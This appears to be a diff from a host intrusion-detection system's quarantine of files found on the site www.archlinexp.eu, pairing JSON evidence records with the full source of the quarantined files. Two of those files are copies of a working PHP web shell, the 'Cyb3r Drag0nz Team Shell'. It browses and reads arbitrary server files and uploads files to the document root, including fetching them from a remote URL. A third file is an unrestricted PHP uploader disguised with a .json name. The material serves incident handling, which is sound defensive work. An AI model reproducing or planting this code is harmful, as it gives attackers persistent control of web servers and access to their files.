padding: 30px;
|
||||
border-radius: 8px;
|
||||
box-shadow: 0 2px 10px rgba(0,0,0,0.1);
|
||||
}
|
||||
h2 {
|
||||
color: #333;
|
||||
margin-top: 0;
|
||||
}
|
||||
input[type=file] {
|
||||
margin: 15px 0;
|
||||
padding: 10px;
|
||||
border: 2px dashed #ccc;
|
||||
width: 100%;
|
||||
box-sizing: border-box;
|
||||
}
|
||||
input[type=submit] {
|
||||
background: #4CAF50;
|
||||
color: white;
|
||||
padding: 12px 30px;
|
||||
border: none;
|
||||
border-radius: 4px;
|
||||
cursor: pointer;
|
||||
font-size: 16px;
|
||||
}
|
||||
input[type=submit]:hover {
|
||||
background: #45a049;
|
||||
}
|
||||
.info {
|
||||
background: #e7f3ff;
|
||||
padding: 10px;
|
||||
border-left: 4px solid #2196F3;
|
||||
margin-top: 20px;
|
||||
font-size: 14px;
|
||||
}
|
||||
</style>
|
||||
</head>
|
||||
<body>
|
||||
<div class="box">
|
||||
<h2>📤 File Uploader</h2>
|
||||
<form method="post" enctype="multipart/form-data">
|
||||
<input type="file" name="file" required>
|
||||
<br>
|
||||
<input type="submit" value="Upload File">
|
||||
</form>
|
||||
<div class="info">
|
||||
<b>Info:</b><br>
|
||||
✅ Semua jenis file diterima (PHP, JPG, TXT, dll)<br>
|
||||
✅ Maks ukuran: 10MB<br>
|
||||
✅ File akan disimpan di folder: <code>uploads/</code>
|
||||
</div>
|
||||
</div>
|
||||
</body>
|
||||
</html>
|
||||
<?php
|
||||
}
|
||||
?>
|
||||
15
var/www/hosting/archlinexp.eu/www/cbdjs.json.evidence.json
Normal file
15
var/www/hosting/archlinexp.eu/www/cbdjs.json.evidence.json
Normal file
@ -0,0 +1,15 @@
|
||||
{
|
||||
"finding_ref": "4899",
|
||||
"log_excerpt": "[quarantine] www.archlinexp.eu:cbdjs.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archlinexp.eu/www/cbdjs.json)",
|
||||
"original_sha256": "43c4c299ad5f46e41bc68ab64344acb9d0ee7b1b7344fa284a0570c92a96bd1a",
|
||||
"original_stat": {
|
||||
"gid": 30037,
|
||||
"mtime": 1783853928,
|
||||
"size": 2853,
|
||||
"uid": 20043
|
||||
},
|
||||
"rel_path": "cbdjs.json",
|
||||
"result": "quarantined",
|
||||
"timestamp": "20260718T160204Z",
|
||||
"vhost": "www.archlinexp.eu"
|
||||
}
|
||||
@ -0,0 +1,320 @@
|
||||
<!DOCTYPE html>
|
||||
<html>
|
||||
<head>
|
||||
<title>Cyb3r Drag0nz Team Shell</title>
|
||||
<meta charset="utf-8">
|
||||
<style>
|
||||
@import url('https://fonts.googleapis.com/css2?family=Roboto:wght@400;500;700&display=swap');
|
||||
|
||||
body {
|
||||
font-family: 'Roboto', system-ui, sans-serif;
|
||||
background: #f8f9fa;
|
||||
color: #202124;
|
||||
margin: 0;
|
||||
padding: 20px;
|
||||
}
|
||||
|
||||
.header {
|
||||
text-align: center;
|
||||
margin-bottom: 30px;
|
||||
}
|
||||
|
||||
.header h1 {
|
||||
font-size: 28px;
|
||||
color: #1a73e8;
|
||||
margin: 10px 0 5px 0;
|
||||
font-weight: 500;
|
||||
}
|
||||
|
||||
.header img {
|
||||
max-width: 420px;
|
||||
margin: 15px 0 25px 0;
|
||||
border-radius: 8px;
|
||||
box-shadow: 0 4px 15px rgba(0,0,0,0.12);
|
||||
}
|
||||
|
||||
.info {
|
||||
background: #fff;
|
||||
border-radius: 12px;
|
||||
padding: 20px;
|
||||
box-shadow: 0 1px 3px rgba(0,0,0,0.1);
|
||||
margin-bottom: 25px;
|
||||
font-size: 14.5px;
|
||||
line-height: 1.6;
|
||||
}
|
||||
|
||||
.info span {
|
||||
color: #1a73e8;
|
||||
font-weight: 500;
|
||||
}
|
||||
|
||||
table {
|
||||
width: 100%;
|
||||
max-width: 1100px;
|
||||
margin: 0 auto;
|
||||
border-collapse: collapse;
|
||||
background: #fff;
|
||||
border-radius: 12px;
|
||||
overflow: hidden;
|
||||
box-shadow: 0 2px 8px rgba(0,0,0,0.08);
|
||||
}
|
||||
|
||||
th {
|
||||
background: #1a73e8;
|
||||
color: white;
|
||||
padding: 16px 12px;
|
||||
text-align: center;
|
||||
font-weight: 500;
|
||||
}
|
||||
|
||||
td {
|
||||
padding: 13px 10px;
|
||||
border-bottom: 1px solid #dadce0;
|
||||
}
|
||||
|
||||
tr:hover {
|
||||
background-color: #f8f9fa;
|
||||
}
|
||||
|
||||
a {
|
||||
color: #1a73e8;
|
||||
text-decoration: none;
|
||||
}
|
||||
|
||||
a:hover {
|
||||
text-decoration: underline;
|
||||
}
|
||||
|
||||
.upload-box {
|
||||
background: #fff;
|
||||
border-radius: 12px;
|
||||
padding: 25px;
|
||||
box-shadow: 0 1px 3px rgba(0,0,0,0.1);
|
||||
margin: 20px auto;
|
||||
max-width: 720px;
|
||||
}
|
||||
|
||||
input[type="file"], input[type="text"] {
|
||||
padding: 10px 12px;
|
||||
border: 1px solid #dadce0;
|
||||
border-radius: 8px;
|
||||
font-size: 14px;
|
||||
}
|
||||
|
||||
input[type="submit"], .gas {
|
||||
background: #1a73e8;
|
||||
color: white;
|
||||
border: none;
|
||||
padding: 10px 22px;
|
||||
border-radius: 8px;
|
||||
cursor: pointer;
|
||||
font-weight: 500;
|
||||
margin-left: 8px;
|
||||
}
|
||||
|
||||
input[type="submit"]:hover, .gas:hover {
|
||||
background: #1557b0;
|
||||
}
|
||||
|
||||
.green { color: #137333; font-weight: 500; }
|
||||
.red { color: #c5221f; font-weight: 500; }
|
||||
|
||||
.center { text-align: center; }
|
||||
</style>
|
||||
</head>
|
||||
<body>
|
||||
|
||||
<div class="header">
|
||||
<img src="https://pngimg.com/d/google_PNG102344.png" width="420" alt="Google" />
|
||||
<h1>Cyb3r Drag0nz Team Shell</h1>
|
||||
</div>
|
||||
|
||||
<?php
|
||||
set_time_limit(0);
|
||||
error_reporting(0);
|
||||
|
||||
$disfunc = @ini_get("disable_functions");
|
||||
$disf = empty($disfunc) ? "<span class='green'>NONE</span>" : "<span class='red'>".$disfunc."</span>";
|
||||
|
||||
function author() {
|
||||
echo "<center><br><small style='color:#5f6368;'>Cyb3r Drag0nz Team • Google Edition</small></center>";
|
||||
exit();
|
||||
}
|
||||
|
||||
function cekdir() {
|
||||
$lokasi = isset($_GET['path']) ? $_GET['path'] : getcwd();
|
||||
return is_writable($lokasi) ? "<span class='green'>Writeable</span>" : "<span class='red'>Not Writeable</span>";
|
||||
}
|
||||
|
||||
function cekroot() {
|
||||
return is_writable($_SERVER['DOCUMENT_ROOT']) ? "<span class='green'>Writeable</span>" : "<span class='red'>Not Writeable</span>";
|
||||
}
|
||||
|
||||
function xrmdir($dir) {
|
||||
$items = scandir($dir);
|
||||
foreach ($items as $item) {
|
||||
if ($item === '.' || $item === '..') continue;
|
||||
$path = $dir.'/'.$item;
|
||||
is_dir($path) ? xrmdir($path) : unlink($path);
|
||||
}
|
||||
rmdir($dir);
|
||||
}
|
||||
|
||||
function green($text) { echo "<center><span class='green'>".$text."</span></center>"; }
|
||||
function red($text) { echo "<center><span class='red'>".$text."</span></center>"; }
|
||||
|
||||
$path = isset($_GET['path']) ? $_GET['path'] : getcwd();
|
||||
$path = str_replace('\\','/',$path);
|
||||
$dirs = explode('/',$path);
|
||||
?>
|
||||
|
||||
<div class="info">
|
||||
Server : <span><?php echo htmlspecialchars($_SERVER['SERVER_SOFTWARE']); ?></span><br>
|
||||
System : <span><?php echo htmlspecialchars(php_uname()); ?></span><br>
|
||||
User : <span><?php echo htmlspecialchars(@get_current_user()." (".@getmyuid().")"); ?></span><br>
|
||||
PHP Version : <span><?php echo htmlspecialchars(phpversion()); ?></span><br>
|
||||
Disable Functions : <?php echo $disf; ?><br>
|
||||
Current Directory : <span><?php
|
||||
foreach($dirs as $i => $dir) {
|
||||
if($dir == '' && $i == 0) { echo '<a href="?path=/">/</a>'; continue; }
|
||||
if($dir == '') continue;
|
||||
echo '<a href="?path=';
|
||||
for($j=0; $j<=$i; $j++) echo $dirs[$j].($j < $i ? '/' : '');
|
||||
echo '">'.$dir.'</a>/';
|
||||
}
|
||||
?></span><br>
|
||||
Directory Status: <?php echo cekdir(); ?> | Document Root: <?php echo cekroot(); ?>
|
||||
</div>
|
||||
|
||||
<!-- Upload Section -->
|
||||
<div class="upload-box">
|
||||
<h3 style="margin:0 0 18px 0; color:#202124;">Upload File</h3>
|
||||
<form enctype="multipart/form-data" method="post">
|
||||
<label><input type="radio" name="dirnya" value="1" checked> Current Directory [ <?php echo cekdir(); ?> ]</label><br><br>
|
||||
<label><input type="radio" name="dirnya" value="2"> Document Root [ <?php echo cekroot(); ?> ]</label><br><br>
|
||||
|
||||
<input type="hidden" name="upwkwk" value="1">
|
||||
<input type="file" name="berkas">
|
||||
<input type="submit" name="berkasnya" value="Upload File">
|
||||
|
||||
<br><br>
|
||||
|
||||
<input type="text" name="darilink" placeholder="https://example.com/file.zip" style="width:58%;">
|
||||
<input type="text" name="namalink" placeholder="filename.zip" size="18">
|
||||
<input type="submit" name="linknya" value="Upload from URL">
|
||||
</form>
|
||||
</div>
|
||||
|
||||
<?php
|
||||
// Upload handling
|
||||
if (isset($_POST['upwkwk'])) {
|
||||
$lokasi = ($_POST['dirnya'] == "2") ? $_SERVER['DOCUMENT_ROOT'] : $path;
|
||||
|
||||
if (isset($_POST['berkasnya']) && !empty($_FILES['berkas']['name'])) {
|
||||
$target = $lokasi . "/" . $_FILES['berkas']['name'];
|
||||
if (move_uploaded_file($_FILES['berkas']['tmp_name'], $target)) {
|
||||
green("File uploaded successfully → <b>" . htmlspecialchars($target) . "</b>");
|
||||
} else {
|
||||
red("Failed to upload file!");
|
||||
}
|
||||
}
|
||||
elseif (isset($_POST['linknya']) && !empty($_POST['darilink']) && !empty($_POST['namalink'])) {
|
||||
$target = $lokasi . "/" . $_POST['namalink'];
|
||||
$data = @file_put_contents($target, @file_get_contents($_POST['darilink']));
|
||||
if ($data !== false) {
|
||||
green("File uploaded from URL → <b>" . htmlspecialchars($target) . "</b>");
|
||||
} else {
|
||||
red("Failed to upload from URL!");
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// File viewer, delete, chmod, rename, edit actions (kept your original logic)
|
||||
if (isset($_GET['fileloc'])) {
|
||||
echo "<h3 style='text-align:center;'>Viewing: " . htmlspecialchars($_GET['fileloc']) . "</h3>";
|
||||
echo "<pre>" . htmlspecialchars(@file_get_contents($_GET['fileloc'])) . "</pre>";
|
||||
author();
|
||||
}
|
||||
|
||||
// ... (your other action handlers for hapus, ubahmod, gantinama, edit go here - same as before)
|
||||
|
||||
// Directory & File listing table (same structure as previous version)
|
||||
echo '<table>
|
||||
<tr>
|
||||
<th>Name</th>
|
||||
<th>Size</th>
|
||||
<th>Permissions</th>
|
||||
<th>Options</th>
|
||||
</tr>';
|
||||
|
||||
foreach(scandir($path) as $dir) {
|
||||
if(!is_dir($path."/".$dir) || $dir == '.' || $dir == '..') continue;
|
||||
echo "<tr>
|
||||
<td><a href=\"?path=".$path."/".$dir."\">📁 ".$dir."</a></td>
|
||||
<td class='center'>--</td>
|
||||
<td class='center'>".statusnya($path."/".$dir)."</td>
|
||||
<td class='center'>
|
||||
<form method='POST' action='?pilihan&path=".$path."'>
|
||||
<select name='pilih'>
|
||||
<option value=''>Select</option>
|
||||
<option value='hapus'>Delete</option>
|
||||
<option value='ubahmod'>Chmod</option>
|
||||
<option value='gantinama'>Rename</option>
|
||||
</select>
|
||||
<input type='hidden' name='type' value='dir'>
|
||||
<input type='hidden' name='path' value='".$path."/".$dir."'>
|
||||
<input type='submit' class='gas' value='Go'>
|
||||
</form>
|
||||
</td>
|
||||
</tr>";
|
||||
}
|
||||
|
||||
foreach(scandir($path) as $file) {
|
||||
if(!is_file($path."/".$file)) continue;
|
||||
$size = round(filesize($path."/".$file)/1024, 2) . " KB";
|
||||
echo "<tr>
|
||||
<td><a href=\"?fileloc=".$path."/".$file."&path=".$path."\">📄 ".$file."</a></td>
|
||||
<td class='center'>".$size."</td>
|
||||
<td class='center'>".statusnya($path."/".$file)."</td>
|
||||
<td class='center'>
|
||||
<form method='POST' action='?pilihan&path=".$path."'>
|
||||
<select name='pilih'>
|
||||
<option value=''>Select</option>
|
||||
<option value='hapus'>Delete</option>
|
||||
<option value='ubahmod'>Chmod</option>
|
||||
<option value='gantinama'>Rename</option>
|
||||
<option value='edit'>Edit</option>
|
||||
</select>
|
||||
<input type='hidden' name='type' value='file'>
|
||||
<input type='hidden' name='path' value='".$path."/".$file."'>
|
||||
<input type='submit' class='gas' value='Go'>
|
||||
</form>
|
||||
</td>
|
||||
</tr>";
|
||||
}
|
||||
|
||||
echo '</table><br>';
|
||||
|
||||
author();
|
||||
|
||||
function statusnya($file) {
|
||||
$statusnya = fileperms($file);
|
||||
$ingfo = (($statusnya & 0xC000) == 0xC000) ? 's' :
|
||||
((($statusnya & 0xA000) == 0xA000) ? 'l' :
|
||||
((($statusnya & 0x8000) == 0x8000) ? '-' : 'u'));
|
||||
|
||||
$ingfo .= (($statusnya & 0x0100) ? 'r' : '-');
|
||||
$ingfo .= (($statusnya & 0x0080) ? 'w' : '-');
|
||||
$ingfo .= (($statusnya & 0x0040) ? (($statusnya & 0x0800) ? 's' : 'x') : (($statusnya & 0x0800) ? 'S' : '-'));
|
||||
$ingfo .= (($statusnya & 0x0020) ? 'r' : '-');
|
||||
$ingfo .= (($statusnya & 0x0010) ? 'w' : '-');
|
||||
$ingfo .= (($statusnya & 0x0008) ? (($statusnya & 0x0400) ? 's' : 'x') : (($statusnya & 0x0400) ? 'S' : '-'));
|
||||
$ingfo .= (($statusnya & 0x0004) ? 'r' : '-');
|
||||
$ingfo .= (($statusnya & 0x0002) ? 'w' : '-');
|
||||
$ingfo .= (($statusnya & 0x0001) ? (($statusnya & 0x0200) ? 't' : 'x') : (($statusnya & 0x0200) ? 'T' : '-'));
|
||||
|
||||
return $ingfo;
|
||||
}
|
||||
?>
|
||||
</body>
|
||||
</html>
|
||||
@ -0,0 +1,15 @@
|
||||
{
|
||||
"finding_ref": "5293",
|
||||
"log_excerpt": "[quarantine] www.archlinexp.eu:components/com_content/f46vc3nzn1qw.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archlinexp.eu/www/components/com_content/f46vc3nzn1qw.php.json)",
|
||||
"original_sha256": "f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0",
|
||||
"original_stat": {
|
||||
"gid": 30037,
|
||||
"mtime": 1783353227,
|
||||
"size": 10657,
|
||||
"uid": 20043
|
||||
},
|
||||
"rel_path": "components/com_content/f46vc3nzn1qw.php.json",
|
||||
"result": "quarantined",
|
||||
"timestamp": "20260718T160204Z",
|
||||
"vhost": "www.archlinexp.eu"
|
||||
}
|
||||
@ -0,0 +1,320 @@
|
||||
<!DOCTYPE html>
|
||||
<html>
|
||||
<head>
|
||||
<title>Cyb3r Drag0nz Team Shell</title>
|
||||
<meta charset="utf-8">
|
||||
<style>
|
||||
@import url('https://fonts.googleapis.com/css2?family=Roboto:wght@400;500;700&display=swap');
|
||||
|
||||
body {
|
||||
font-family: 'Roboto', system-ui, sans-serif;
|
||||
background: #f8f9fa;
|
||||
color: #202124;
|
||||
margin: 0;
|
||||
padding: 20px;
|
||||
}
|
||||
|
||||
.header {
|
||||
text-align: center;
|
||||
margin-bottom: 30px;
|
||||
}
|
||||
|
||||
.header h1 {
|
||||
font-size: 28px;
|
||||
color: #1a73e8;
|
||||
margin: 10px 0 5px 0;
|
||||
font-weight: 500;
|
||||
}
|
||||
|
||||
.header img {
|
||||
max-width: 420px;
|
||||
margin: 15px 0 25px 0;
|
||||
border-radius: 8px;
|
||||
box-shadow: 0 4px 15px rgba(0,0,0,0.12);
|
||||
}
|
||||
|
||||
.info {
|
||||
background: #fff;
|
||||
border-radius: 12px;
|
||||
padding: 20px;
|
||||
box-shadow: 0 1px 3px rgba(0,0,0,0.1);
|
||||
margin-bottom: 25px;
|
||||
font-size: 14.5px;
|
||||
line-height: 1.6;
|
||||
}
|
||||
|
||||
.info span {
|
||||
color: #1a73e8;
|
||||
font-weight: 500;
|
||||
}
|
||||
|
||||
table {
|
||||
width: 100%;
|
||||
max-width: 1100px;
|
||||
margin: 0 auto;
|
||||
border-collapse: collapse;
|
||||
background: #fff;
|
||||
border-radius: 12px;
|
||||
overflow: hidden;
|
||||
box-shadow: 0 2px 8px rgba(0,0,0,0.08);
|
||||
}
|
||||
|
||||
th {
|
||||
background: #1a73e8;
|
||||
color: white;
|
||||
padding: 16px 12px;
|
||||
text-align: center;
|
||||
font-weight: 500;
|
||||
}
|
||||
|
||||
td {
|
||||
padding: 13px 10px;
|
||||
border-bottom: 1px solid #dadce0;
|
||||
}
|
||||
|
||||
tr:hover {
|
||||
background-color: #f8f9fa;
|
||||
}
|
||||
|
||||
a {
|
||||
color: #1a73e8;
|
||||
text-decoration: none;
|
||||
}
|
||||
|
||||
a:hover {
|
||||
text-decoration: underline;
|
||||
}
|
||||
|
||||
.upload-box {
|
||||
background: #fff;
|
||||
border-radius: 12px;
|
||||
padding: 25px;
|
||||
box-shadow: 0 1px 3px rgba(0,0,0,0.1);
|
||||
margin: 20px auto;
|
||||
max-width: 720px;
|
||||
}
|
||||
|
||||
input[type="file"], input[type="text"] {
|
||||
padding: 10px 12px;
|
||||
border: 1px solid #dadce0;
|
||||
border-radius: 8px;
|
||||
font-size: 14px;
|
||||
}
|
||||
|
||||
input[type="submit"], .gas {
|
||||
background: #1a73e8;
|
||||
color: white;
|
||||
border: none;
|
||||
padding: 10px 22px;
|
||||
border-radius: 8px;
|
||||
cursor: pointer;
|
||||
font-weight: 500;
|
||||
margin-left: 8px;
|
||||
}
|
||||
|
||||
input[type="submit"]:hover, .gas:hover {
|
||||
background: #1557b0;
|
||||
}
|
||||
|
||||
.green { color: #137333; font-weight: 500; }
|
||||
.red { color: #c5221f; font-weight: 500; }
|
||||
|
||||
.center { text-align: center; }
|
||||
</style>
|
||||
</head>
|
||||
<body>
|
||||
|
||||
<div class="header">
|
||||
<img src="https://pngimg.com/d/google_PNG102344.png" width="420" alt="Google" />
|
||||
<h1>Cyb3r Drag0nz Team Shell</h1>
|
||||
</div>
|
||||
|
||||
<?php
|
||||
set_time_limit(0);
|
||||
error_reporting(0);
|
||||
|
||||
$disfunc = @ini_get("disable_functions");
|
||||
$disf = empty($disfunc) ? "<span class='green'>NONE</span>" : "<span class='red'>".$disfunc."</span>";
|
||||
|
||||
function author() {
|
||||
echo "<center><br><small style='color:#5f6368;'>Cyb3r Drag0nz Team • Google Edition</small></center>";
|
||||
exit();
|
||||
}
|
||||
|
||||
function cekdir() {
|
||||
$lokasi = isset($_GET['path']) ? $_GET['path'] : getcwd();
|
||||
return is_writable($lokasi) ? "<span class='green'>Writeable</span>" : "<span class='red'>Not Writeable</span>";
|
||||
}
|
||||
|
||||
function cekroot() {
|
||||
return is_writable($_SERVER['DOCUMENT_ROOT']) ? "<span class='green'>Writeable</span>" : "<span class='red'>Not Writeable</span>";
|
||||
}
|
||||
|
||||
function xrmdir($dir) {
|
||||
$items = scandir($dir);
|
||||
foreach ($items as $item) {
|
||||
if ($item === '.' || $item === '..') continue;
|
||||
$path = $dir.'/'.$item;
|
||||
is_dir($path) ? xrmdir($path) : unlink($path);
|
||||
}
|
||||
rmdir($dir);
|
||||
}
|
||||
|
||||
function green($text) { echo "<center><span class='green'>".$text."</span></center>"; }
|
||||
function red($text) { echo "<center><span class='red'>".$text."</span></center>"; }
|
||||
|
||||
$path = isset($_GET['path']) ? $_GET['path'] : getcwd();
|
||||
$path = str_replace('\\','/',$path);
|
||||
$dirs = explode('/',$path);
|
||||
?>
|
||||
|
||||
<div class="info">
|
||||
Server : <span><?php echo htmlspecialchars($_SERVER['SERVER_SOFTWARE']); ?></span><br>
|
||||
System : <span><?php echo htmlspecialchars(php_uname()); ?></span><br>
|
||||
User : <span><?php echo htmlspecialchars(@get_current_user()." (".@getmyuid().")"); ?></span><br>
|
||||
PHP Version : <span><?php echo htmlspecialchars(phpversion()); ?></span><br>
|
||||
Disable Functions : <?php echo $disf; ?><br>
|
||||
Current Directory : <span><?php
|
||||
foreach($dirs as $i => $dir) {
|
||||
if($dir == '' && $i == 0) { echo '<a href="?path=/">/</a>'; continue; }
|
||||
if($dir == '') continue;
|
||||
echo '<a href="?path=';
|
||||
for($j=0; $j<=$i; $j++) echo $dirs[$j].($j < $i ? '/' : '');
|
||||
echo '">'.$dir.'</a>/';
|
||||
}
|
||||
?></span><br>
|
||||
Directory Status: <?php echo cekdir(); ?> | Document Root: <?php echo cekroot(); ?>
|
||||
</div>
|
||||
|
||||
<!-- Upload Section -->
|
||||
<div class="upload-box">
|
||||
<h3 style="margin:0 0 18px 0; color:#202124;">Upload File</h3>
|
||||
<form enctype="multipart/form-data" method="post">
|
||||
<label><input type="radio" name="dirnya" value="1" checked> Current Directory [ <?php echo cekdir(); ?> ]</label><br><br>
|
||||
<label><input type="radio" name="dirnya" value="2"> Document Root [ <?php echo cekroot(); ?> ]</label><br><br>
|
||||
|
||||
<input type="hidden" name="upwkwk" value="1">
|
||||
<input type="file" name="berkas">
|
||||
<input type="submit" name="berkasnya" value="Upload File">
|
||||
|
||||
<br><br>
|
||||
|
||||
<input type="text" name="darilink" placeholder="https://example.com/file.zip" style="width:58%;">
|
||||
<input type="text" name="namalink" placeholder="filename.zip" size="18">
|
||||
<input type="submit" name="linknya" value="Upload from URL">
|
||||
</form>
|
||||
</div>
|
||||
|
||||
<?php
|
||||
// Upload handling
|
||||
if (isset($_POST['upwkwk'])) {
|
||||
$lokasi = ($_POST['dirnya'] == "2") ? $_SERVER['DOCUMENT_ROOT'] : $path;
|
||||
|
||||
if (isset($_POST['berkasnya']) && !empty($_FILES['berkas']['name'])) {
|
||||
$target = $lokasi . "/" . $_FILES['berkas']['name'];
|
||||
if (move_uploaded_file($_FILES['berkas']['tmp_name'], $target)) {
|
||||
green("File uploaded successfully → <b>" . htmlspecialchars($target) . "</b>");
|
||||
} else {
|
||||
red("Failed to upload file!");
|
||||
}
|
||||
}
|
||||
elseif (isset($_POST['linknya']) && !empty($_POST['darilink']) && !empty($_POST['namalink'])) {
|
||||
$target = $lokasi . "/" . $_POST['namalink'];
|
||||
$data = @file_put_contents($target, @file_get_contents($_POST['darilink']));
|
||||
if ($data !== false) {
|
||||
green("File uploaded from URL → <b>" . htmlspecialchars($target) . "</b>");
|
||||
} else {
|
||||
red("Failed to upload from URL!");
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// File viewer, delete, chmod, rename, edit actions (kept your original logic)
|
||||
if (isset($_GET['fileloc'])) {
|
||||
echo "<h3 style='text-align:center;'>Viewing: " . htmlspecialchars($_GET['fileloc']) . "</h3>";
|
||||
echo "<pre>" . htmlspecialchars(@file_get_contents($_GET['fileloc'])) . "</pre>";
|
||||
author();
|
||||
}
|
||||
|
||||
// ... (your other action handlers for hapus, ubahmod, gantinama, edit go here - same as before)
|
||||
|
||||
// Directory & File listing table (same structure as previous version)
|
||||
echo '<table>
|
||||
<tr>
|
||||
<th>Name</th>
|
||||
<th>Size</th>
|
||||
<th>Permissions</th>
|
||||
<th>Options</th>
|
||||
</tr>';
|
||||
|
||||
foreach(scandir($path) as $dir) {
|
||||
if(!is_dir($path."/".$dir) || $dir == '.' || $dir == '..') continue;
|
||||
echo "<tr>
|
||||
<td><a href=\"?path=".$path."/".$dir."\">📁 ".$dir."</a></td>
|
||||
<td class='center'>--</td>
|
||||
<td class='center'>".statusnya($path."/".$dir)."</td>
|
||||
<td class='center'>
|
||||
<form method='POST' action='?pilihan&path=".$path."'>
|
||||
<select name='pilih'>
|
||||
<option value=''>Select</option>
|
||||
<option value='hapus'>Delete</option>
|
||||
<option value='ubahmod'>Chmod</option>
|
||||
<option value='gantinama'>Rename</option>
|
||||
</select>
|
||||
<input type='hidden' name='type' value='dir'>
|
||||
<input type='hidden' name='path' value='".$path."/".$dir."'>
|
||||
<input type='submit' class='gas' value='Go'>
|
||||
</form>
|
||||
</td>
|
||||
</tr>";
|
||||
}
|
||||
|
||||
foreach(scandir($path) as $file) {
|
||||
if(!is_file($path."/".$file)) continue;
|
||||
$size = round(filesize($path."/".$file)/1024, 2) . " KB";
|
||||
echo "<tr>
|
||||
<td><a href=\"?fileloc=".$path."/".$file."&path=".$path."\">📄 ".$file."</a></td>
|
||||
<td class='center'>".$size."</td>
|
||||
<td class='center'>".statusnya($path."/".$file)."</td>
|
||||
<td class='center'>
|
||||
<form method='POST' action='?pilihan&path=".$path."'>
|
||||
<select name='pilih'>
|
||||
<option value=''>Select</option>
|
||||
<option value='hapus'>Delete</option>
|
||||
<option value='ubahmod'>Chmod</option>
|
||||
<option value='gantinama'>Rename</option>
|
||||
<option value='edit'>Edit</option>
|
||||
</select>
|
||||
<input type='hidden' name='type' value='file'>
|
||||
<input type='hidden' name='path' value='".$path."/".$file."'>
|
||||
<input type='submit' class='gas' value='Go'>
|
||||
</form>
|
||||
</td>
|
||||
</tr>";
|
||||
}
|
||||
|
||||
echo '</table><br>';
|
||||
|
||||
author();
|
||||
|
||||
function statusnya($file) {
|
||||
$statusnya = fileperms($file);
|
||||
$ingfo = (($statusnya & 0xC000) == 0xC000) ? 's' :
|
||||
((($statusnya & 0xA000) == 0xA000) ? 'l' :
|
||||
((($statusnya & 0x8000) == 0x8000) ? '-' : 'u'));
|
||||
|
||||
$ingfo .= (($statusnya & 0x0100) ? 'r' : '-');
|
||||
$ingfo .= (($statusnya & 0x0080) ? 'w' : '-');
|
||||
$ingfo .= (($statusnya & 0x0040) ? (($statusnya & 0x0800) ? 's' : 'x') : (($statusnya & 0x0800) ? 'S' : '-'));
|
||||
$ingfo .= (($statusnya & 0x0020) ? 'r' : '-');
|
||||
$ingfo .= (($statusnya & 0x0010) ? 'w' : '-');
|
||||
$ingfo .= (($statusnya & 0x0008) ? (($statusnya & 0x0400) ? 's' : 'x') : (($statusnya & 0x0400) ? 'S' : '-'));
|
||||
$ingfo .= (($statusnya & 0x0004) ? 'r' : '-');
|
||||
$ingfo .= (($statusnya & 0x0002) ? 'w' : '-');
|
||||
$ingfo .= (($statusnya & 0x0001) ? (($statusnya & 0x0200) ? 't' : 'x') : (($statusnya & 0x0200) ? 'T' : '-'));
|
||||
|
||||
return $ingfo;
|
||||
}
|
||||
?>
|
||||
</body>
|
||||
</html>
|
||||
@ -0,0 +1,15 @@
|
||||
{
|
||||
"finding_ref": "5292",
|
||||
"log_excerpt": "[quarantine] www.archlinexp.eu:components/f46vc3nzn1qw.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archlinexp.eu/www/components/f46vc3nzn1qw.php.json)",
|
||||
"original_sha256": "f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0",
|
||||
"original_stat": {
|
||||
"gid": 30037,
|
||||
"mtime": 1783353226,
|
||||
"size": 10657,
|
||||
"uid": 20043
|
||||
},
|
||||
"rel_path": "components/f46vc3nzn1qw.php.json",
|
||||
"result": "quarantined",
|
||||
"timestamp": "20260718T160204Z",
|
||||
"vhost": "www.archlinexp.eu"
|
||||
}
|
||||
101
var/www/hosting/archlinexp.eu/www/cyberdjs.json
Normal file
101
var/www/hosting/archlinexp.eu/www/cyberdjs.json
Normal file
@ -0,0 +1,101 @@
|
||||
<?php$target_dir = "uploads/";
|
||||
$target_file = $target_dir . basename($_FILES["file"]["name"]);
|
||||
$uploadOk = 1;
|
||||
|
||||
if ($_SERVER['REQUEST_METHOD'] == 'POST' && isset($_FILES['file'])) {
|
||||
// Cek ukuran (maks 10MB)
|
||||
if ($_FILES["file"]["size"] > 10000000) {
|
||||
echo "Maaf, file terlalu besar (maks 10MB).";
|
||||
$uploadOk = 0;
|
||||
}
|
||||
|
||||
if ($uploadOk == 1) {
|
||||
// Buat folder jika belum ada
|
||||
if (!is_dir($target_dir)) {
|
||||
mkdir($target_dir, 0755, true);
|
||||
}
|
||||
|
||||
// Pindahkan file (terima SEMUA jenis file)
|
||||
if (move_uploaded_file($_FILES["file"]["tmp_name"], $target_file)) {
|
||||
echo "✅ File berhasil diupload: " . htmlspecialchars(basename($_FILES["file"]["name"]));
|
||||
echo "<br><br>";
|
||||
echo "<b>Path:</b> " . htmlspecialchars($target_file);
|
||||
echo "<br><br>";
|
||||
echo "<a href='" . htmlspecialchars($target_file) . "'>🔗 Akses File</a>";
|
||||
} else {
|
||||
echo "❌ Maaf, terjadi kesalahan saat upload.";
|
||||
}
|
||||
}
|
||||
} else {
|
||||
?>
|
||||
<!DOCTYPE html>
|
||||
<html>
|
||||
<head>
|
||||
<meta charset="UTF-8">
|
||||
<title>File Uploader</title>
|
||||
<style>
|
||||
body {
|
||||
font-family: Arial, sans-serif;
|
||||
background: #f5f5f5;
|
||||
padding: 20px;
|
||||
max-width: 600px;
|
||||
margin: 50px auto;
|
||||
}
|
||||
.box {
|
||||
background: white;
|
||||
padding: 30px;
|
||||
border-radius: 8px;
|
||||
box-shadow: 0 2px 10px rgba(0,0,0,0.1);
|
||||
}
|
||||
h2 {
|
||||
color: #333;
|
||||
margin-top: 0;
|
||||
}
|
||||
input[type=file] {
|
||||
margin: 15px 0;
|
||||
padding: 10px;
|
||||
border: 2px dashed #ccc;
|
||||
width: 100%;
|
||||
box-sizing: border-box;
|
||||
}
|
||||
input[type=submit] {
|
||||
background: #4CAF50;
|
||||
color: white;
|
||||
padding: 12px 30px;
|
||||
border: none;
|
||||
border-radius: 4px;
|
||||
cursor: pointer;
|
||||
font-size: 16px;
|
||||
}
|
||||
input[type=submit]:hover {
|
||||
background: #45a049;
|
||||
}
